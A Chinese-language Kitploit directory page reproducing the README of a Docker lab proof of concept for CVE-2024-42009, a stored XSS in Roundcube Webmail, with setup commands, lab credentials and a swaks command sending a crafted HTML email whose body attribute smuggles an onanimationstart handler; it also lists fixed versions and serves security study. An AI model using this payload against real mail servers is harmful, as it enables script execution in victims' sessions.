Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-42009 — 基于 Docker 的概念验证,针对 CVE-2024-42009,即 Roundcube Webmail 中的存储型 XSS 漏洞。演示了通过精心构造的 HTML 邮件进行利用,并包含易受攻击实验环境的搭建配置。 | Kitploit
工具/GitHubGitHub/zaidarif47/cve-2024-42009
漏洞分析漏洞利用Web应用程序漏洞利用Web安全学习与教育实验室与实践
GitHubzaidarif47/cve-2024-42009

CVE-2024-42009

基于 Docker 的概念验证,针对 CVE-2024-42009,即 Roundcube Webmail 中的存储型 XSS 漏洞。演示了通过精心构造的 HTML 邮件进行利用,并包含易受攻击实验环境的搭建配置。

查看仓库
14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-42009 – Roundcube存储型XSS(Docker PoC)

📌 概述

该仓库演示了针对 CVE-2024-42009 的有效概念验证(PoC),这是 Roundcube Webmail 中的一个存储型跨站脚本(XSS)漏洞。

该漏洞由不正确的 HTML 净化以及随后不安全地重新处理属性导致,攻击者可通过构造的 HTML 邮件注入恶意事件处理程序。


⚠️ 受影响版本

  • Roundcube ≤ 1.5.7
  • Roundcube ≤ 1.6.7

🧠 漏洞摘要

Roundcube 会净化收到的 HTML 邮件,但随后会重新处理某些属性(例如 bgcolor、畸形属性),导致:

  • 属性边界混淆
  • 注入新属性
  • 重新引入危险的事件处理程序(例如 onanimationstart)

当受害者打开恶意邮件时,可执行任意 JavaScript。


🐳 环境搭建(Docker)

1. 克隆仓库

root@kitploit:~
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC

2. 启动漏洞环境

root@kitploit:~
docker compose up -d

⏳ 等待约 10–15 秒,让邮件服务器完成初始化。


3. 创建测试用户

root@kitploit:~
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'

4. 访问 Roundcube

root@kitploit:~
http://localhost:8080

凭据:

  • [email protected] / victim123
  • [email protected] / attacker123

💣 漏洞利用

使用 swaks 工具发送恶意邮件:

root@kitploit:~
swaks --to [email protected] \
      --from [email protected] \
      --server localhost:2525 \
      --header "Content-Type: text/html; charset=utf-8" \
      --header "Subject: CVE-2024-42009 PoC" \
      --body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'

📸 概念验证

  1. 登录 Roundcube 受害者账户
  2. 打开邮件收件箱
  3. JavaScript 执行(弹出 alert 对话框)

1. 恶意邮件已发送

步骤 1

2. XSS 被触发

步骤 3


🛡️ 缓解措施

升级至修复版本:

  • Roundcube ≥ 1.6.8
  • Roundcube ≥ 1.5.8

📚 参考资料

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-42009
  • Sonarsource: https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009

⚖️ 免责声明

本项目仅供教育和授权的安全研究使用。 未经适当许可,请勿用于任何系统。

下载工具